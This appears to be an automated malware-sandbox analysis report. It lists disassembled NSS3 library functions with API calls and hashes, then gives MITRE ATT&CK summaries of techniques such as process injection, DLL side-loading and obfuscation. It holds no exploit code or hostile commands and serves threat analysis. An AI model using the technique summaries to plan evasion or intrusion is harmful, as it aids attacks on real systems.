Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: d7fd8a2e858283b280a11d907fea82accde96784a258bd78bbdc8e7d1940f0de
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 2721D1B1A007429BE700CF26D944B52B7E5BFA4348F25C259E82C87A62FB70E595C6E0

Function 6CD2EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CD17FFA,?,6CD19767,?,8B7874C0,0000A48E), ref: 6CD2EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CD17FFA,?,6CD19767,?,8B7874C0,0000A48E), ref: 6CD2EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CD17FFA,?,6CD19767,?,8B7874C0,0000A48E), ref: 6CD2EE14

Part of subcall function 6CD00BE0: malloc.MOZGLUE(6CCF8D2D,?,00000000,?), ref: 6CD00BF8
Part of subcall function 6CD00BE0: TlsGetValue.KERNEL32(6CCF8D2D,?,00000000,?), ref: 6CD00C15

memcpy.VCRUNTIME140(?,?,6CD19767,00000000,00000000,6CD17FFA,?,6CD19767,?,8B7874C0,0000A48E), ref: 6CD2EE33

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: b5467ce6e732d302b7b399794151ed3a43a45279b71f34c37f5278671bc17465
Instruction ID: 8da808600d94754b18cbed44a1020c27077eafabd7806a63b7a4e343759c7b61
Opcode Fuzzy Hash: b5467ce6e732d302b7b399794151ed3a43a45279b71f34c37f5278671bc17465
Instruction Fuzzy Hash: 2B1170B1A00706ABEB109F75DC84B46B3A8EB0435EF244535EA1996E60E339F46487E2

Function 6CD108D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CD109B3,0000001A,?), ref: 6CD108E9

Part of subcall function 6CD00840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CD008B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CD108FD

Part of subcall function 6CCFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CCF8D2D,?,00000000,?), ref: 6CCFFB85
Part of subcall function 6CCFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CCFFBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6CD10939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CD10953

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: 114e07e2b13828cfb64746f5f8fac9bdae0d6fc1027e6adcd16661e7b3481425
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: 520108B560934AABFB046B757C20B67379C9F40298F088039EC19C5F21FB31F424CAA0

Function 6CCC8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CCC8DE7
EnterCriticalSection.KERNEL32 ref: 6CCC8DFC
PR_Unlock.NSS3 ref: 6CCC8E2D
PR_SetError.NSS3 ref: 6CCC8E49

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 5d017bbaa03a6d1f77ff8ffacac9331eb63561dfc14764d13f07e3f99ccfaac4
Instruction ID: cee4ae17f8b3c0081f695eab45deadb4df069bacf50eb11e89b7b655edac6af7
Opcode Fuzzy Hash: 5d017bbaa03a6d1f77ff8ffacac9331eb63561dfc14764d13f07e3f99ccfaac4
Instruction Fuzzy Hash: 22115E75605A059FD700AF78D5886AABBF4FF45354F01496ADD88DBB00E730E8A4CBD2

Function 6CD4AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CD35F17,?,?,?,?,?,?,?,?,6CD3AAD4), ref: 6CD4AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CD35F17,?,?,?,?,?,?,?,?,6CD3AAD4), ref: 6CD4ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CD3AAD4), ref: 6CD4ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CD3AAD4), ref: 6CD4ACDB

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 41c99565f654d5ed23728f001c181bbe42c2fae28a84f7f05c8d016f0f681ac9
Instruction ID: 52059daa834315d89dcaace69ed1d6f3ab42fc21a1e0e31ad11295805523dfc0
Opcode Fuzzy Hash: 41c99565f654d5ed23728f001c181bbe42c2fae28a84f7f05c8d016f0f681ac9
Instruction Fuzzy Hash: 74015EB5601B019BEB60DF2AE948753B7E8BF44A99B108839D95EC3E10E731F464CBD1

Function 6CD4AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6CD35D40,00000000,?,?,6CD26AC6,6CD3639C), ref: 6CD4AC2D

Part of subcall function 6CCEADC0: TlsGetValue.KERNEL32(?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE10
Part of subcall function 6CCEADC0: EnterCriticalSection.KERNEL32(?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE24
Part of subcall function 6CCEADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CCCD079,00000000,00000001), ref: 6CCEAE5A
Part of subcall function 6CCEADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE6F
Part of subcall function 6CCEADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAE7F
Part of subcall function 6CCEADC0: TlsGetValue.KERNEL32(?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAEB1
Part of subcall function 6CCEADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CCCCDBB,?,6CCCD079,00000000,00000001), ref: 6CCEAEC9

PK11_FreeSymKey.NSS3(?,6CD35D40,00000000,?,?,6CD26AC6,6CD3639C), ref: 6CD4AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CD35D40,00000000,?,?,6CD26AC6,6CD3639C), ref: 6CD4AC59
free.MOZGLUE(8CB6FF01,6CD26AC6,6CD3639C,?,?,?,?,?,?,?,?,?,6CD35D40,00000000,?,6CD3AAD4), ref: 6CD4AC62

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: a62b1e7b1b14412f7aa8fe7f7d3600a0e5021553577505afb14d33f21d57aefc
Instruction ID: 665ff159ab8801be3b190a60dc9420173056a6d192d5c832add8ef72fc9ecb58
Opcode Fuzzy Hash: a62b1e7b1b14412f7aa8fe7f7d3600a0e5021553577505afb14d33f21d57aefc
Instruction Fuzzy Hash: 42012CB5600204DFDB50DF15E8C0B4677A8AF45758F1880A8EA498F706E731E954CBA1

Function 6CDBCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CDBCC61
free.MOZGLUE ref: 6CDBCC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CDBCC80
free.MOZGLUE(?), ref: 6CDBCC87

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 64f5ee6a10c9a8e72b829e0c4e3e6d9376c9d20659fbd0ff257209afd93edb52
Instruction ID: ba80dbc8da15b2df8374f3ebd67c100ea444cca06ea91ce3c286d49d74394a6c
Opcode Fuzzy Hash: 64f5ee6a10c9a8e72b829e0c4e3e6d9376c9d20659fbd0ff257209afd93edb52
Instruction Fuzzy Hash: C7E030767006089BDA20EFA8DC8489677ACFE892747154525E791C3740D231F915CBA1

Function 6CCF4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CCF4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CCF4DE6

Strings

%d.%d, xrefs: 6CCF4DDE

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: daa50baadebce9cd388dc1e4bf30475e78524c7a47f1376efc61b6246719cd3e
Instruction ID: 42315066b3d605c0a0ce31eec7ced8db48b8b54313b03cf07f28a24087124ddb
Opcode Fuzzy Hash: daa50baadebce9cd388dc1e4bf30475e78524c7a47f1376efc61b6246719cd3e
Instruction Fuzzy Hash: 6F31D8B2D042196BEB509BA1DC01BFF7768EF41708F050469ED659B791FB30990ACBB2

Function 6CD3AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6CD3AF78

Part of subcall function 6CC9ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9ACE2
Part of subcall function 6CC9ACC0: malloc.MOZGLUE(00000001), ref: 6CC9ACEC
Part of subcall function 6CC9ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC9AD02
Part of subcall function 6CC9ACC0: TlsGetValue.KERNEL32 ref: 6CC9AD3C
Part of subcall function 6CC9ACC0: calloc.MOZGLUE(00000001,?), ref: 6CC9AD8C
Part of subcall function 6CC9ACC0: PR_Unlock.NSS3 ref: 6CC9ADC0
Part of subcall function 6CC9ACC0: PR_Unlock.NSS3 ref: 6CC9AE8C
Part of subcall function 6CC9ACC0: free.MOZGLUE(?), ref: 6CC9AEAB

memcpy.VCRUNTIME140(6CE03084,6CE002AC,00000090), ref: 6CD3AF94

Strings

SSL, xrefs: 6CD3AF73

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 60e5df5c1e0dc8ce19405c232242abeffbf46d09ff2ea745443d0a8e431664f6
Instruction ID: 3d3d1d4dbae9ed66e8bce6e8b9e38eaacdeacb55854c4f49da7880f78e8f6439
Opcode Fuzzy Hash: 60e5df5c1e0dc8ce19405c232242abeffbf46d09ff2ea745443d0a8e431664f6
Instruction Fuzzy Hash: C1214AF2716E68AADB00DF52A953B127AB1B343348B10620DC14D5BBB4D37380289FD9

Function 6CC90F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6CC90936,FFFFE8AE,?,6CC216B7,00000000,?,6CC90936,00000000,?,6CC2204A), ref: 6CC90F1B

Part of subcall function 6CC91370: GetSystemInfo.KERNEL32(?,?,?,?,6CC90936,?,6CC90F20,6CC90936,FFFFE8AE,?,6CC216B7,00000000,?,6CC90936,00000000), ref: 6CC9138F

PR_NewLogModule.NSS3(clock,6CC90936,FFFFE8AE,?,6CC216B7,00000000,?,6CC90936,00000000,?,6CC2204A), ref: 6CC90F25

Part of subcall function 6CC91110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6CC90936,00000001,00000040), ref: 6CC91130
Part of subcall function 6CC91110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6CC90936,00000001,00000040), ref: 6CC91142
Part of subcall function 6CC91110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC90936,00000001), ref: 6CC91167

Strings

clock, xrefs: 6CC90F20

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 4e4f1b860518c693818aa913719189c61ad193189f0b7f202451ff6fa0b446c1
Instruction ID: 0237bd80d8a4ee3aa8a8d7bf4b9b2323b0cd9764b7c6eba9960f12b3e30c858b
Opcode Fuzzy Hash: 4e4f1b860518c693818aa913719189c61ad193189f0b7f202451ff6fa0b446c1
Instruction Fuzzy Hash: 94D02231B0430421C510229F9C46B96B3FCC7C337AF00882AE00881D201B2654EEC2A5

Function 6CD00DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CD00DF5
TlsGetValue.KERNEL32 ref: 6CD00E2D
TlsGetValue.KERNEL32 ref: 6CD00E58
TlsGetValue.KERNEL32 ref: 6CD00E84

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: f3df7264464aa3a3310b38c134064cc7900c6f635ef6568aba7659bda8bba9b5
Instruction ID: 11855f635e0f68a9c8148005b34b89c66bc0442b381c82153c07f704d6c46cbf
Opcode Fuzzy Hash: f3df7264464aa3a3310b38c134064cc7900c6f635ef6568aba7659bda8bba9b5
Instruction Fuzzy Hash: E831D4B0744380DBEB106F7CC88425977B8FF4A388F01462DD9989BA31EB35E495CB82

Function 6CD00F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CCA2AF5,?,?,?,?,?,6CCA0A1B,00000000), ref: 6CD00F1A
malloc.MOZGLUE(00000001), ref: 6CD00F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CD00F42
TlsGetValue.KERNEL32 ref: 6CD00F5B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: bdfdaf1485e104c0da1015410393fa02b2f340c84981c65eb6d9f3401917ab71
Instruction ID: c2c486f1f465e346ca737f9066a764ae4ebc7f0c97f439f10d3810bd5350bf6d
Opcode Fuzzy Hash: bdfdaf1485e104c0da1015410393fa02b2f340c84981c65eb6d9f3401917ab71
Instruction Fuzzy Hash: AE01B1B1B01280ABE7102F3E9D445667FECEF922D9B010165E95DC6A31EB31E85586E2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

